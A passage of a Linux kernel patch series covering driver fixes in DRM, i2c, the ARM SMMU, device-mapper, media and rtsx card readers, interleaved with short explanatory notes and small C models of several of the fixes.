+-	dsi->mode_flags = MIPI_DSI_MODE_VIDEO | MIPI_DSI_MODE_VIDEO_BURST;
++	dsi->mode_flags = MIPI_DSI_MODE_VIDEO | MIPI_DSI_MODE_VIDEO_BURST |
++			  MIPI_DSI_MODE_VIDEO_NO_HFP | MIPI_DSI_MODE_VIDEO_NO_HBP |
++			  MIPI_DSI_MODE_VIDEO_NO_HSA | MIPI_DSI_MODE_NO_EOT_PACKET;
+ 
+ 	ret = devm_mipi_dsi_attach(dev, dsi);
+ 	if (ret < 0) {
+diff --git a/drivers/gpu/drm/i915/gt/intel_engine_cs.c b/drivers/gpu/drm/i915/gt/intel_engine_cs.c
+index b458547e1fc6e..07967adce16aa 100644
+--- a/drivers/gpu/drm/i915/gt/intel_engine_cs.c
++++ b/drivers/gpu/drm/i915/gt/intel_engine_cs.c
+@@ -541,7 +541,6 @@ static int intel_engine_setup(struct intel_gt *gt, enum intel_engine_id id,
+ 		DRIVER_CAPS(i915)->has_logical_contexts = true;
+ 
+ 	ewma__engine_latency_init(&engine->latency);
+-	seqcount_init(&engine->stats.execlists.lock);
+ 
+ 	ATOMIC_INIT_NOTIFIER_HEAD(&engine->context_status_notifier);
+ 
+diff --git a/drivers/gpu/drm/i915/gt/intel_execlists_submission.c b/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
+index fc4a846289855..f903ee1ce06e7 100644
+--- a/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
++++ b/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
+@@ -3546,6 +3546,8 @@ int intel_execlists_submission_setup(struct intel_engine_cs *engine)
+ 	logical_ring_default_vfuncs(engine);
+ 	logical_ring_default_irqs(engine);
+ 
++	seqcount_init(&engine->stats.execlists.lock);
++
+ 	if (engine->flags & I915_ENGINE_HAS_RCS_REG_STATE)
+ 		rcs_submission_override(engine);
+ 
+diff --git a/drivers/gpu/drm/i915/gt/intel_ggtt.c b/drivers/gpu/drm/i915/gt/intel_ggtt.c
+index 2049a00417afa..a6d0463b18d91 100644
+--- a/drivers/gpu/drm/i915/gt/intel_ggtt.c
++++ b/drivers/gpu/drm/i915/gt/intel_ggtt.c
+@@ -500,20 +500,31 @@ void intel_ggtt_unbind_vma(struct i915_address_space *vm,
+ 	vm->clear_range(vm, vma_res->start, vma_res->vma_size);
+ }
+ 
++/*
++ * Reserve the top of the GuC address space for firmware images. Addresses
++ * beyond GUC_GGTT_TOP in the GuC address space are inaccessible by GuC,
++ * which makes for a suitable range to hold GuC/HuC firmware images if the
++ * size of the GGTT is 4G. However, on a 32-bit platform the size of the GGTT
++ * is limited to 2G, which is less than GUC_GGTT_TOP, but we reserve a chunk
++ * of the same size anyway, which is far more than needed, to keep the logic
++ * in uc_fw_ggtt_offset() simple.
++ */
++#define GUC_TOP_RESERVE_SIZE (SZ_4G - GUC_GGTT_TOP)
++
+ static int ggtt_reserve_guc_top(struct i915_ggtt *ggtt)
+ {
+-	u64 size;
++	u64 offset;
+ 	int ret;
+ 
+ 	if (!intel_uc_uses_guc(&ggtt->vm.gt->uc))
+ 		return 0;
+ 
+-	GEM_BUG_ON(ggtt->vm.total <= GUC_GGTT_TOP);
+-	size = ggtt->vm.total - GUC_GGTT_TOP;
++	GEM_BUG_ON(ggtt->vm.total <= GUC_TOP_RESERVE_SIZE);
++	offset = ggtt->vm.total - GUC_TOP_RESERVE_SIZE;
+ 
+-	ret = i915_gem_gtt_reserve(&ggtt->vm, NULL, &ggtt->uc_fw, size,
+-				   GUC_GGTT_TOP, I915_COLOR_UNEVICTABLE,
+-				   PIN_NOEVICT);
++	ret = i915_gem_gtt_reserve(&ggtt->vm, NULL, &ggtt->uc_fw,
++				   GUC_TOP_RESERVE_SIZE, offset,
++				   I915_COLOR_UNEVICTABLE, PIN_NOEVICT);
+ 	if (ret)
+ 		drm_dbg(&ggtt->vm.i915->drm,
+ 			"Failed to reserve top of GGTT for GuC\n");
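
The GGTT hunk above stops reserving "everything above GUC_GGTT_TOP", which trips the old GEM_BUG_ON on a 2G GGTT, and instead reserves a fixed SZ_4G - GUC_GGTT_TOP chunk at the top of whatever GGTT exists. A runnable check of the arithmetic (GUC_GGTT_TOP taken as the i915 value, 0xFEE00000):

#include <stdint.h>
#include <stdio.h>

#define SZ_4G		(1ull << 32)
#define GUC_GGTT_TOP	0xFEE00000ull
#define GUC_TOP_RESERVE_SIZE (SZ_4G - GUC_GGTT_TOP)	/* 18 MiB */

int main(void)
{
	uint64_t ggtt_total = 1ull << 31;	/* a 2G GGTT, smaller than GUC_GGTT_TOP */
	uint64_t offset = ggtt_total - GUC_TOP_RESERVE_SIZE;

	printf("reserve %#llx bytes at offset %#llx\n",
	       (unsigned long long)GUC_TOP_RESERVE_SIZE,
	       (unsigned long long)offset);
	return 0;
}
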
+diff --git a/drivers/gpu/drm/meson/meson_encoder_hdmi.c b/drivers/gpu/drm/meson/meson_encoder_hdmi.c
+index 53231bfdf7e24..b14e6e507c61b 100644
+--- a/drivers/gpu/drm/meson/meson_encoder_hdmi.c
++++ b/drivers/gpu/drm/meson/meson_encoder_hdmi.c
+@@ -332,6 +332,8 @@ static void meson_encoder_hdmi_hpd_notify(struct drm_bridge *bridge,
+ 			return;
+ 
+ 		cec_notifier_set_phys_addr_from_edid(encoder_hdmi->cec_notifier, edid);
++
++		kfree(edid);
+ 	} else
+ 		cec_notifier_phys_addr_invalidate(encoder_hdmi->cec_notifier);
+ }
+diff --git a/drivers/gpu/drm/tests/drm_mm_test.c b/drivers/gpu/drm/tests/drm_mm_test.c
+index c4b66eeae2039..13fa4a18a11b2 100644
+--- a/drivers/gpu/drm/tests/drm_mm_test.c
++++ b/drivers/gpu/drm/tests/drm_mm_test.c
+@@ -939,7 +939,7 @@ static void drm_test_mm_insert_range(struct kunit *test)
+ 		KUNIT_ASSERT_FALSE(test, __drm_test_mm_insert_range(test, count, size, 0, max - 1));
+ 		KUNIT_ASSERT_FALSE(test, __drm_test_mm_insert_range(test, count, size, 0, max / 2));
+ 		KUNIT_ASSERT_FALSE(test, __drm_test_mm_insert_range(test, count, size,
+-								    max / 2, max / 2));
++								    max / 2, max));
+ 		KUNIT_ASSERT_FALSE(test, __drm_test_mm_insert_range(test, count, size,
+ 								    max / 4 + 1, 3 * max / 4 - 1));
+ 
+diff --git a/drivers/i2c/busses/i2c-i801.c b/drivers/i2c/busses/i2c-i801.c
+index 1fda1eaa6d6ab..da1f6b60f9c9a 100644
+--- a/drivers/i2c/busses/i2c-i801.c
++++ b/drivers/i2c/busses/i2c-i801.c
+@@ -1754,6 +1754,7 @@ static int i801_probe(struct pci_dev *dev, const struct pci_device_id *id)
+ 		"SMBus I801 adapter at %04lx", priv->smba);
+ 	err = i2c_add_adapter(&priv->adapter);
+ 	if (err) {
++		platform_device_unregister(priv->tco_pdev);
+ 		i801_acpi_remove(priv);
+ 		return err;
+ 	}
+diff --git a/drivers/i2c/busses/i2c-npcm7xx.c b/drivers/i2c/busses/i2c-npcm7xx.c
+index 83457359ec450..767dd15b3c881 100644
+--- a/drivers/i2c/busses/i2c-npcm7xx.c
++++ b/drivers/i2c/busses/i2c-npcm7xx.c
+@@ -696,6 +696,7 @@ static void npcm_i2c_callback(struct npcm_i2c *bus,
+ {
+ 	struct i2c_msg *msgs;
+ 	int msgs_num;
++	bool do_complete = false;
+ 
+ 	msgs = bus->msgs;
+ 	msgs_num = bus->msgs_num;
+@@ -724,23 +725,17 @@ static void npcm_i2c_callback(struct npcm_i2c *bus,
+ 				 msgs[1].flags & I2C_M_RD)
+ 				msgs[1].len = info;
+ 		}
+-		if (completion_done(&bus->cmd_complete) == false)
+-			complete(&bus->cmd_complete);
+-	break;
+-
++		do_complete = true;
++		break;
+ 	case I2C_NACK_IND:
+ 		/* MASTER transmit got a NACK before tx all bytes */
+ 		bus->cmd_err = -ENXIO;
+-		if (bus->master_or_slave == I2C_MASTER)
+-			complete(&bus->cmd_complete);
+-
++		do_complete = true;
+ 		break;
+ 	case I2C_BUS_ERR_IND:
+ 		/* Bus error */
+ 		bus->cmd_err = -EAGAIN;
+-		if (bus->master_or_slave == I2C_MASTER)
+-			complete(&bus->cmd_complete);
+-
++		do_complete = true;
+ 		break;
+ 	case I2C_WAKE_UP_IND:
+ 		/* I2C wake up */
+@@ -754,6 +749,8 @@ static void npcm_i2c_callback(struct npcm_i2c *bus,
+ 	if (bus->slave)
+ 		bus->master_or_slave = I2C_SLAVE;
+ #endif
++	if (do_complete)
++		complete(&bus->cmd_complete);
+ }
+ 
+ static u8 npcm_i2c_fifo_usage(struct npcm_i2c *bus)
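
The npcm7xx hunk above replaces three per-case completions with a single do_complete flag, so a master transfer completes exactly once regardless of which event fired. A runnable model of the consolidated flow (the driver's event set is abbreviated here, and complete_cmd() stands in for complete(&bus->cmd_complete)):

#include <stdbool.h>
#include <stdio.h>

enum i2c_ind {
	I2C_MASTER_DONE_IND,
	I2C_NACK_IND,
	I2C_BUS_ERR_IND,
	I2C_WAKE_UP_IND,
};

static void complete_cmd(void) { puts("cmd_complete"); }

static void callback(enum i2c_ind event)
{
	bool do_complete = false;

	switch (event) {
	case I2C_MASTER_DONE_IND:	/* transfer finished */
	case I2C_NACK_IND:		/* NACK before all bytes sent */
	case I2C_BUS_ERR_IND:		/* bus error */
		do_complete = true;
		break;
	case I2C_WAKE_UP_IND:		/* wake-up: nothing to complete */
		break;
	}

	if (do_complete)		/* the single completion point */
		complete_cmd();
}

int main(void)
{
	callback(I2C_NACK_IND);		/* completes once */
	callback(I2C_WAKE_UP_IND);	/* completes zero times */
	return 0;
}
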
+diff --git a/drivers/i2c/busses/i2c-xiic.c b/drivers/i2c/busses/i2c-xiic.c
+index b41a6709e47f2..b27bfc7765993 100644
+--- a/drivers/i2c/busses/i2c-xiic.c
++++ b/drivers/i2c/busses/i2c-xiic.c
+@@ -420,7 +420,7 @@ static irqreturn_t xiic_process(int irq, void *dev_id)
+ 		 * reset the IP instead of just flush fifos
+ 		 */
+ 		ret = xiic_reinit(i2c);
+-		if (!ret)
++		if (ret < 0)
+ 			dev_dbg(i2c->adap.dev.parent, "reinit failed\n");
+ 
+ 		if (i2c->rx_msg) {
+diff --git a/drivers/i2c/muxes/i2c-demux-pinctrl.c b/drivers/i2c/muxes/i2c-demux-pinctrl.c
+index f7a7405d4350a..8e8688e8de0fb 100644
+--- a/drivers/i2c/muxes/i2c-demux-pinctrl.c
++++ b/drivers/i2c/muxes/i2c-demux-pinctrl.c
+@@ -243,6 +243,10 @@ static int i2c_demux_pinctrl_probe(struct platform_device *pdev)
+ 
+ 		props[i].name = devm_kstrdup(&pdev->dev, "status", GFP_KERNEL);
+ 		props[i].value = devm_kstrdup(&pdev->dev, "ok", GFP_KERNEL);
++		if (!props[i].name || !props[i].value) {
++			err = -ENOMEM;
++			goto err_rollback;
++		}
+ 		props[i].length = 3;
+ 
+ 		of_changeset_init(&priv->chan[i].chgset);
+diff --git a/drivers/i2c/muxes/i2c-mux-gpio.c b/drivers/i2c/muxes/i2c-mux-gpio.c
+index 73a23e117ebec..0930a51c8c7c0 100644
+--- a/drivers/i2c/muxes/i2c-mux-gpio.c
++++ b/drivers/i2c/muxes/i2c-mux-gpio.c
+@@ -105,8 +105,10 @@ static int i2c_mux_gpio_probe_fw(struct gpiomux *mux,
+ 
+ 		} else if (is_acpi_node(child)) {
+ 			rc = acpi_get_local_address(ACPI_HANDLE_FWNODE(child), values + i);
+-			if (rc)
++			if (rc) {
++				fwnode_handle_put(child);
+ 				return dev_err_probe(dev, rc, "Cannot get address\n");
++			}
+ 		}
+ 
+ 		i++;
+diff --git a/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3-sva.c b/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3-sva.c
+index 5968a568aae2a..ffba8ce93ff88 100644
+--- a/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3-sva.c
++++ b/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3-sva.c
+@@ -186,6 +186,15 @@ static void arm_smmu_free_shared_cd(struct arm_smmu_ctx_desc *cd)
+ 	}
+ }
+ 
++/*
++ * Cloned from the MAX_TLBI_OPS in arch/arm64/include/asm/tlbflush.h, this
++ * is used as a threshold to replace per-page TLBI commands to issue in the
++ * command queue with an address-space TLBI command, when SMMU w/o a range
++ * invalidation feature handles too many per-page TLBI commands, which will
++ * otherwise result in a soft lockup.
++ */
++#define CMDQ_MAX_TLBI_OPS		(1 << (PAGE_SHIFT - 3))
++
+ static void arm_smmu_mm_invalidate_range(struct mmu_notifier *mn,
+ 					 struct mm_struct *mm,
+ 					 unsigned long start, unsigned long end)
+@@ -200,10 +209,22 @@ static void arm_smmu_mm_invalidate_range(struct mmu_notifier *mn,
+ 	 * range. So do a simple translation here by calculating size correctly.
+ 	 */
+ 	size = end - start;
++	if (!(smmu_domain->smmu->features & ARM_SMMU_FEAT_RANGE_INV)) {
++		if (size >= CMDQ_MAX_TLBI_OPS * PAGE_SIZE)
++			size = 0;
++	}
++
++	if (!(smmu_domain->smmu->features & ARM_SMMU_FEAT_BTM)) {
++		if (!size)
++			arm_smmu_tlb_inv_asid(smmu_domain->smmu,
++					      smmu_mn->cd->asid);
++		else
++			arm_smmu_tlb_inv_range_asid(start, size,
++						    smmu_mn->cd->asid,
++						    PAGE_SIZE, false,
++						    smmu_domain);
++	}
+ 
+-	if (!(smmu_domain->smmu->features & ARM_SMMU_FEAT_BTM))
+-		arm_smmu_tlb_inv_range_asid(start, size, smmu_mn->cd->asid,
+-					    PAGE_SIZE, false, smmu_domain);
+ 	arm_smmu_atc_inv_domain(smmu_domain, mm->pasid, start, size);
+ }
+ 
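
The SMMU hunk above caps per-page invalidations: once a range would need CMDQ_MAX_TLBI_OPS or more TLBI commands on hardware without range invalidation, it collapses to a single by-ASID flush, signalled by size == 0. A runnable check of the threshold math for 4K pages:

#include <stdio.h>

#define PAGE_SHIFT	12
#define PAGE_SIZE	(1ul << PAGE_SHIFT)
#define CMDQ_MAX_TLBI_OPS (1ul << (PAGE_SHIFT - 3))	/* 512 for 4K pages */

int main(void)
{
	unsigned long size = 4ul << 20;		/* a 4 MiB invalidation */

	if (size >= CMDQ_MAX_TLBI_OPS * PAGE_SIZE)	/* 512 * 4K = 2 MiB */
		size = 0;	/* fall back to one by-ASID invalidation */
	printf("size after clamp: %lu\n", size);
	return 0;
}
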
+diff --git a/drivers/md/dm-core.h b/drivers/md/dm-core.h
+index 28c641352de9b..71dcd8fd4050a 100644
+--- a/drivers/md/dm-core.h
++++ b/drivers/md/dm-core.h
+@@ -214,6 +214,7 @@ struct dm_table {
+ 
+ 	/* a list of devices used by this table */
+ 	struct list_head devices;
++	struct rw_semaphore devices_lock;
+ 
+ 	/* events get handed up using this callback */
+ 	void (*event_fn)(void *);
+diff --git a/drivers/md/dm-ioctl.c b/drivers/md/dm-ioctl.c
+index 2afd2d2a0f407..206e6ce554dc7 100644
+--- a/drivers/md/dm-ioctl.c
++++ b/drivers/md/dm-ioctl.c
+@@ -1566,6 +1566,8 @@ static void retrieve_deps(struct dm_table *table,
+ 	struct dm_dev_internal *dd;
+ 	struct dm_target_deps *deps;
+ 
++	down_read(&table->devices_lock);
++
+ 	deps = get_result_buffer(param, param_size, &len);
+ 
+ 	/*
+@@ -1580,7 +1582,7 @@ static void retrieve_deps(struct dm_table *table,
+ 	needed = struct_size(deps, dev, count);
+ 	if (len < needed) {
+ 		param->flags |= DM_BUFFER_FULL_FLAG;
+-		return;
++		goto out;
+ 	}
+ 
+ 	/*
+@@ -1592,6 +1594,9 @@ static void retrieve_deps(struct dm_table *table,
+ 		deps->dev[count++] = huge_encode_dev(dd->dm_dev->bdev->bd_dev);
+ 
+ 	param->data_size = param->data_start + needed;
++
++out:
++	up_read(&table->devices_lock);
+ }
+ 
+ static int table_deps(struct file *filp, struct dm_ioctl *param, size_t param_size)
+diff --git a/drivers/md/dm-table.c b/drivers/md/dm-table.c
+index 288f600ee56dc..dac6a5f25f2be 100644
+--- a/drivers/md/dm-table.c
++++ b/drivers/md/dm-table.c
+@@ -134,6 +134,7 @@ int dm_table_create(struct dm_table **result, fmode_t mode,
+ 		return -ENOMEM;
+ 
+ 	INIT_LIST_HEAD(&t->devices);
++	init_rwsem(&t->devices_lock);
+ 
+ 	if (!num_targets)
+ 		num_targets = KEYS_PER_NODE;
+@@ -362,15 +363,19 @@ int dm_get_device(struct dm_target *ti, const char *path, fmode_t mode,
+ 			return -ENODEV;
+ 	}
+ 
++	down_write(&t->devices_lock);
++
+ 	dd = find_device(&t->devices, dev);
+ 	if (!dd) {
+ 		dd = kmalloc(sizeof(*dd), GFP_KERNEL);
+-		if (!dd)
+-			return -ENOMEM;
++		if (!dd) {
++			r = -ENOMEM;
++			goto unlock_ret_r;
++		}
+ 
+ 		if ((r = dm_get_table_device(t->md, dev, mode, &dd->dm_dev))) {
+ 			kfree(dd);
+-			return r;
++			goto unlock_ret_r;
+ 		}
+ 
+ 		refcount_set(&dd->count, 1);
+@@ -380,12 +385,17 @@ int dm_get_device(struct dm_target *ti, const char *path, fmode_t mode,
+ 	} else if (dd->dm_dev->mode != (mode | dd->dm_dev->mode)) {
+ 		r = upgrade_mode(dd, mode, t->md);
+ 		if (r)
+-			return r;
++			goto unlock_ret_r;
+ 	}
+ 	refcount_inc(&dd->count);
+ out:
++	up_write(&t->devices_lock);
+ 	*result = dd->dm_dev;
+ 	return 0;
++
++unlock_ret_r:
++	up_write(&t->devices_lock);
++	return r;
+ }
+ EXPORT_SYMBOL(dm_get_device);
+ 
+@@ -421,9 +431,12 @@ static int dm_set_device_limits(struct dm_target *ti, struct dm_dev *dev,
+ void dm_put_device(struct dm_target *ti, struct dm_dev *d)
+ {
+ 	int found = 0;
+-	struct list_head *devices = &ti->table->devices;
++	struct dm_table *t = ti->table;
++	struct list_head *devices = &t->devices;
+ 	struct dm_dev_internal *dd;
+ 
++	down_write(&t->devices_lock);
++
+ 	list_for_each_entry(dd, devices, list) {
+ 		if (dd->dm_dev == d) {
+ 			found = 1;
+@@ -432,14 +445,17 @@ void dm_put_device(struct dm_target *ti, struct dm_dev *d)
+ 	}
+ 	if (!found) {
+ 		DMERR("%s: device %s not in table devices list",
+-		      dm_device_name(ti->table->md), d->name);
+-		return;
++		      dm_device_name(t->md), d->name);
++		goto unlock_ret;
+ 	}
+ 	if (refcount_dec_and_test(&dd->count)) {
+-		dm_put_table_device(ti->table->md, d);
++		dm_put_table_device(t->md, d);
+ 		list_del(&dd->list);
+ 		kfree(dd);
+ 	}
++
++unlock_ret:
++	up_write(&t->devices_lock);
+ }
+ EXPORT_SYMBOL(dm_put_device);
+ 
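
The dm-table hunks above add devices_lock so that retrieve_deps() can walk the device list under a read lock while dm_get_device()/dm_put_device() mutate it under a write lock. A runnable userspace model using a pthread rwlock in place of the kernel rw_semaphore (build with -lpthread):

#include <pthread.h>
#include <stdio.h>

static pthread_rwlock_t devices_lock = PTHREAD_RWLOCK_INITIALIZER;
static int device_count;

static void get_device(void)
{
	pthread_rwlock_wrlock(&devices_lock);	/* down_write() */
	device_count++;
	pthread_rwlock_unlock(&devices_lock);	/* up_write() */
}

static int retrieve_deps(void)
{
	int n;

	pthread_rwlock_rdlock(&devices_lock);	/* down_read() */
	n = device_count;			/* walk the list safely */
	pthread_rwlock_unlock(&devices_lock);	/* up_read() */
	return n;
}

int main(void)
{
	get_device();
	printf("%d device(s)\n", retrieve_deps());
	return 0;
}
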
+diff --git a/drivers/media/common/videobuf2/frame_vector.c b/drivers/media/common/videobuf2/frame_vector.c
+index 144027035892a..07ebe4424df3a 100644
+--- a/drivers/media/common/videobuf2/frame_vector.c
++++ b/drivers/media/common/videobuf2/frame_vector.c
+@@ -30,6 +30,10 @@
+  * different type underlying the specified range of virtual addresses.
+  * When the function isn't able to map a single page, it returns error.
+  *
++ * Note that get_vaddr_frames() cannot follow VM_IO mappings. It used
++ * to be able to do that, but that could (racily) return non-refcounted
++ * pfns.
++ *
+  * This function takes care of grabbing mmap_lock as necessary.
+  */
+ int get_vaddr_frames(unsigned long start, unsigned int nr_frames,
+@@ -55,8 +59,6 @@ int get_vaddr_frames(unsigned long start, unsigned int nr_frames,
+ 	if (likely(ret > 0))
+ 		return ret;
+ 
+-	/* This used to (racily) return non-refcounted pfns. Let people know */
+-	WARN_ONCE(1, "get_vaddr_frames() cannot follow VM_IO mapping");
+ 	vec->nr_frames = 0;
+ 	return ret ? ret : -EFAULT;
+ }
+diff --git a/drivers/media/platform/marvell/Kconfig b/drivers/media/platform/marvell/Kconfig
+index ec1a16734a280..d6499ffe30e8b 100644
+--- a/drivers/media/platform/marvell/Kconfig
++++ b/drivers/media/platform/marvell/Kconfig
+@@ -7,7 +7,7 @@ config VIDEO_CAFE_CCIC
+ 	depends on V4L_PLATFORM_DRIVERS
+ 	depends on PCI && I2C && VIDEO_DEV
+ 	depends on COMMON_CLK
+-	select VIDEO_OV7670
++	select VIDEO_OV7670 if MEDIA_SUBDRV_AUTOSELECT && VIDEO_CAMERA_SENSOR
+ 	select VIDEOBUF2_VMALLOC
+ 	select VIDEOBUF2_DMA_CONTIG
+ 	select VIDEOBUF2_DMA_SG
+@@ -22,7 +22,7 @@ config VIDEO_MMP_CAMERA
+ 	depends on I2C && VIDEO_DEV
+ 	depends on ARCH_MMP || COMPILE_TEST
+ 	depends on COMMON_CLK
+-	select VIDEO_OV7670
++	select VIDEO_OV7670 if MEDIA_SUBDRV_AUTOSELECT && VIDEO_CAMERA_SENSOR
+ 	select I2C_GPIO
+ 	select VIDEOBUF2_VMALLOC
+ 	select VIDEOBUF2_DMA_CONTIG
+diff --git a/drivers/media/platform/via/Kconfig b/drivers/media/platform/via/Kconfig
+index 8926eb0803b27..6e603c0382487 100644
+--- a/drivers/media/platform/via/Kconfig
++++ b/drivers/media/platform/via/Kconfig
+@@ -7,7 +7,7 @@ config VIDEO_VIA_CAMERA
+ 	depends on V4L_PLATFORM_DRIVERS
+ 	depends on FB_VIA && VIDEO_DEV
+ 	select VIDEOBUF2_DMA_SG
+-	select VIDEO_OV7670
++	select VIDEO_OV7670 if VIDEO_CAMERA_SENSOR
+ 	help
+ 	   Driver support for the integrated camera controller in VIA
+ 	   Chrome9 chipsets.  Currently only tested on OLPC xo-1.5 systems
+diff --git a/drivers/media/usb/em28xx/Kconfig b/drivers/media/usb/em28xx/Kconfig
+index b3c472b8c5a96..cb61fd6cc6c61 100644
+--- a/drivers/media/usb/em28xx/Kconfig
++++ b/drivers/media/usb/em28xx/Kconfig
+@@ -12,8 +12,8 @@ config VIDEO_EM28XX_V4L2
+ 	select VIDEO_SAA711X if MEDIA_SUBDRV_AUTOSELECT
+ 	select VIDEO_TVP5150 if MEDIA_SUBDRV_AUTOSELECT
+ 	select VIDEO_MSP3400 if MEDIA_SUBDRV_AUTOSELECT
+-	select VIDEO_MT9V011 if MEDIA_SUBDRV_AUTOSELECT && MEDIA_CAMERA_SUPPORT
+-	select VIDEO_OV2640 if MEDIA_SUBDRV_AUTOSELECT && MEDIA_CAMERA_SUPPORT
++	select VIDEO_MT9V011 if MEDIA_SUBDRV_AUTOSELECT && VIDEO_CAMERA_SENSOR
++	select VIDEO_OV2640 if MEDIA_SUBDRV_AUTOSELECT && VIDEO_CAMERA_SENSOR
+ 	help
+ 	  This is a video4linux driver for Empia 28xx based TV cards.
+ 
+diff --git a/drivers/media/usb/go7007/Kconfig b/drivers/media/usb/go7007/Kconfig
+index 4ff79940ad8d4..b2a15d9fb1f33 100644
+--- a/drivers/media/usb/go7007/Kconfig
++++ b/drivers/media/usb/go7007/Kconfig
+@@ -12,8 +12,8 @@ config VIDEO_GO7007
+ 	select VIDEO_TW2804 if MEDIA_SUBDRV_AUTOSELECT
+ 	select VIDEO_TW9903 if MEDIA_SUBDRV_AUTOSELECT
+ 	select VIDEO_TW9906 if MEDIA_SUBDRV_AUTOSELECT
+-	select VIDEO_OV7640 if MEDIA_SUBDRV_AUTOSELECT && MEDIA_CAMERA_SUPPORT
+ 	select VIDEO_UDA1342 if MEDIA_SUBDRV_AUTOSELECT
++	select VIDEO_OV7640 if MEDIA_SUBDRV_AUTOSELECT && VIDEO_CAMERA_SENSOR
+ 	help
+ 	  This is a video4linux driver for the WIS GO7007 MPEG
+ 	  encoder chip.
+diff --git a/drivers/media/usb/uvc/uvc_ctrl.c b/drivers/media/usb/uvc/uvc_ctrl.c
+index 067b43a1cb3eb..6d7535efc09de 100644
+--- a/drivers/media/usb/uvc/uvc_ctrl.c
++++ b/drivers/media/usb/uvc/uvc_ctrl.c
+@@ -1347,6 +1347,9 @@ int uvc_query_v4l2_menu(struct uvc_video_chain *chain,
+ 	query_menu->id = id;
+ 	query_menu->index = index;
+ 
++	if (index >= BITS_PER_TYPE(mapping->menu_mask))
++		return -EINVAL;
++
+ 	ret = mutex_lock_interruptible(&chain->ctrl_mutex);
+ 	if (ret < 0)
+ 		return -ERESTARTSYS;
+diff --git a/drivers/misc/cardreader/rts5227.c b/drivers/misc/cardreader/rts5227.c
+index 3dae5e3a16976..cd512284bfb39 100644
+--- a/drivers/misc/cardreader/rts5227.c
++++ b/drivers/misc/cardreader/rts5227.c
+@@ -83,63 +83,20 @@ static void rts5227_fetch_vendor_settings(struct rtsx_pcr *pcr)
+ 
+ static void rts5227_init_from_cfg(struct rtsx_pcr *pcr)
+ {
+-	struct pci_dev *pdev = pcr->pci;
+-	int l1ss;
+-	u32 lval;
+ 	struct rtsx_cr_option *option = &pcr->option;
+ 
+-	l1ss = pci_find_ext_capability(pdev, PCI_EXT_CAP_ID_L1SS);
+-	if (!l1ss)
+-		return;
+-
+-	pci_read_config_dword(pdev, l1ss + PCI_L1SS_CTL1, &lval);
+-
+ 	if (CHK_PCI_PID(pcr, 0x522A)) {
+-		if (0 == (lval & 0x0F))
+-			rtsx_pci_enable_oobs_polling(pcr);
+-		else
++		if (rtsx_check_dev_flag(pcr, ASPM_L1_1_EN | ASPM_L1_2_EN
++				| PM_L1_1_EN | PM_L1_2_EN))
+ 			rtsx_pci_disable_oobs_polling(pcr);
++		else
++			rtsx_pci_enable_oobs_polling(pcr);
+ 	}
+ 
+-	if (lval & PCI_L1SS_CTL1_ASPM_L1_1)
+-		rtsx_set_dev_flag(pcr, ASPM_L1_1_EN);
+-	else
+-		rtsx_clear_dev_flag(pcr, ASPM_L1_1_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_ASPM_L1_2)
+-		rtsx_set_dev_flag(pcr, ASPM_L1_2_EN);
+-	else
+-		rtsx_clear_dev_flag(pcr, ASPM_L1_2_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_PCIPM_L1_1)
+-		rtsx_set_dev_flag(pcr, PM_L1_1_EN);
+-	else
+-		rtsx_clear_dev_flag(pcr, PM_L1_1_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_PCIPM_L1_2)
+-		rtsx_set_dev_flag(pcr, PM_L1_2_EN);
+-	else
+-		rtsx_clear_dev_flag(pcr, PM_L1_2_EN);
+-
+ 	if (option->ltr_en) {
+-		u16 val;
+-
+-		pcie_capability_read_word(pcr->pci, PCI_EXP_DEVCTL2, &val);
+-		if (val & PCI_EXP_DEVCTL2_LTR_EN) {
+-			option->ltr_enabled = true;
+-			option->ltr_active = true;
++		if (option->ltr_enabled)
+ 			rtsx_set_ltr_latency(pcr, option->ltr_active_latency);
+-		} else {
+-			option->ltr_enabled = false;
+-		}
+ 	}
+-
+-	if (rtsx_check_dev_flag(pcr, ASPM_L1_1_EN | ASPM_L1_2_EN
+-				| PM_L1_1_EN | PM_L1_2_EN))
+-		option->force_clkreq_0 = false;
+-	else
+-		option->force_clkreq_0 = true;
+-
+ }
+ 
+ static int rts5227_extra_init_hw(struct rtsx_pcr *pcr)
+@@ -195,7 +152,7 @@ static int rts5227_extra_init_hw(struct rtsx_pcr *pcr)
+ 		}
+ 	}
+ 
+-	if (option->force_clkreq_0 && pcr->aspm_mode == ASPM_MODE_CFG)
++	if (option->force_clkreq_0)
+ 		rtsx_pci_add_cmd(pcr, WRITE_REG_CMD, PETXCFG,
+ 				FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_LOW);
+ 	else
+diff --git a/drivers/misc/cardreader/rts5228.c b/drivers/misc/cardreader/rts5228.c
+index f4ab09439da70..0c7f10bcf6f12 100644
+--- a/drivers/misc/cardreader/rts5228.c
++++ b/drivers/misc/cardreader/rts5228.c
+@@ -386,59 +386,25 @@ static void rts5228_process_ocp(struct rtsx_pcr *pcr)
+ 
+ static void rts5228_init_from_cfg(struct rtsx_pcr *pcr)
+ {
+-	struct pci_dev *pdev = pcr->pci;
+-	int l1ss;
+-	u32 lval;
+ 	struct rtsx_cr_option *option = &pcr->option;
+ 
+-	l1ss = pci_find_ext_capability(pdev, PCI_EXT_CAP_ID_L1SS);
+-	if (!l1ss)
+-		return;
+-
+-	pci_read_config_dword(pdev, l1ss + PCI_L1SS_CTL1, &lval);
+-
+-	if (0 == (lval & 0x0F))
+-		rtsx_pci_enable_oobs_polling(pcr);
+-	else
++	if (rtsx_check_dev_flag(pcr, ASPM_L1_1_EN | ASPM_L1_2_EN
++				| PM_L1_1_EN | PM_L1_2_EN))
+ 		rtsx_pci_disable_oobs_polling(pcr);
+-
+-	if (lval & PCI_L1SS_CTL1_ASPM_L1_1)
+-		rtsx_set_dev_flag(pcr, ASPM_L1_1_EN);
+-	else
+-		rtsx_clear_dev_flag(pcr, ASPM_L1_1_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_ASPM_L1_2)
+-		rtsx_set_dev_flag(pcr, ASPM_L1_2_EN);
+-	else
+-		rtsx_clear_dev_flag(pcr, ASPM_L1_2_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_PCIPM_L1_1)
